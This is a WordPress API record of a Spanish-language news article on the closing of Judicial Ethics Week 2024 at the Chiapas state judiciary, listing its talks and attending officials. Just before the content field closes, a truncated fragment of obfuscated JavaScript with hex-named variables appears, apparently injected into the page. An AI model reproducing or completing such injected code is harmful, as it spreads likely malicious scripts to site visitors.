{"id":17753,"date":"2024-09-10T01:56:49","date_gmt":"2024-09-10T01:56:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17753"},"modified":"2024-09-10T01:56:50","modified_gmt":"2024-09-10T01:56:50","slug":"concluye-la-semana-de-la-etica-judicial-2024-en-el-poder-judicial-del-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17753","title":{"rendered":"Concluye la Semana de la \u00c9tica Judicial 2024 en el Poder Judicial del Estado"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17754\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.36-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-17754\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.36-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.36-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.36-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.36-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"574\" data-id=\"17755\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.11.23-PM-1024x574.jpeg\" alt=\"\" class=\"wp-image-17755\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.11.23-PM-1024x574.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.11.23-PM-300x168.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.11.23-PM-768x431.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.11.23-PM-1536x862.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.11.23-PM-2048x1149.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17756\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.35-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-17756\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.35-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.35-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.35-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-09-at-12.13.35-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>9 de septiembre del 2024. Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial en coordinaci\u00f3n con la Comisi\u00f3n de \u00c9tica Judicial, finaliz\u00f3 con gran \u00e9xito las actividades de la Semana de la \u00c9tica Judicial 2024 que se llevaron a cabo del 2 al 6 de septiembre del presente a\u00f1o.<\/p>\n\n\n\n<p>La clausura tuvo lugar en la Sala de Presidentes, donde la consejera de la Judicatura y miembro de la Comisi\u00f3n de \u00c9tica, Mar\u00eda de Lourdes Hern\u00e1ndez Bonilla, dio la bienvenida en representaci\u00f3n del magistrado presidente Ramos P\u00e9rez. Durante su intervenci\u00f3n, destac\u00f3 la relevancia de promover la \u00e9tica en el sistema judicial, se\u00f1alando que la sociedad exige servidores p\u00fablicos \u00edntegros, que se gu\u00eden por principios s\u00f3lidos y valores en su labor cotidiana de impartir justicia.<\/p>\n\n\n\n<p>Adem\u00e1s, Hern\u00e1ndez Bonilla agradeci\u00f3 a todas y todos los que se sumaron a la Semana de \u00c9tica Judicial, a trav\u00e9s de video y fotograf\u00edas en los diversos Distritos Judiciales. En ese sentido, se\u00f1al\u00f3 que la Semana de la \u00c9tica Judicial 2024 en su segunda edici\u00f3n brind\u00f3 las herramientas para reforzar los valores contenidos en el C\u00f3digo de \u00c9tica, incentivando una participaci\u00f3n activa y un compromiso por parte de quienes integran el Poder Judicial, siempre en beneficio de las personas usuarias que acuden a esta casa de la justicia.<\/p>\n\n\n\n<p>En el marco de esta clausura, se llev\u00f3 a cabo la ponencia titulada La \u00c9tica en el Servicio P\u00fablico, impartida por Luis Luna Le\u00f3n. Dirigida tanto a las y los asistentes presenciales como a quienes siguieron la transmisi\u00f3n en vivo a trav\u00e9s de Facebook Live, la ponencia ofreci\u00f3 reflexiones profundas sobre el compromiso \u00e9tico en la labor p\u00fablica.<\/p>\n\n\n\n<p>Durante la Semana de \u00c9tica Judicial 2024, se realizaron diversas conferencias en la modalidad presencial y virtual a trav\u00e9s del Facebook del Poder Judicial del Estado: La \u00e9tica judicial, requisito para el fortalecimiento de la impartici\u00f3n de justicia; Los principios \u00e9ticos en el quehacer jurisdiccional en coordinacion con el Centro de Etica Judicia; La \u00e9tica y la sociedad contempor\u00e1nea; la mesa de dialogo Mujeres por la integridad: \u00c9tica Judicial y la conferencia magistral, La \u00e9tica en el servicio p\u00fablico y fueron impartidos por las expertas y expertos en materia de \u00e9tica donde se enfatiz\u00f3 el valor de estos espacios para fortalecer el compromiso \u00e9tico de las y los servidores p\u00fablicos del Poder Judicial.<\/p>\n\n\n\n<p>En la clausura estuvieron presentes, el consejero de la Judicatura, Jos\u00e9 Francisco Trujillo Ochoa; el magistrado coordinador de Vistudur\u00eda e integrante de la Comisi\u00f3n de \u00c9tica, Cesar Am\u00edn Aguilar Tejada; la secretaria t\u00e9cnica de la comisi\u00f3n, Karina Mac\u00edas Ozuna, as\u00ed como de magistradas y magistrados, juezas y jueces y del personal personal administrativo y jurisdiccional del Poder Judicial.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 9 de septiembre del 2024. Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial en coordinaci\u00f3n con la Comisi\u00f3n de \u00c9tica Judicial, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17755,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17753","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17753","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17753"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17753\/revisions"}],"predecessor-version":[{"id":17757,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17753\/revisions\/17757"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17755"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}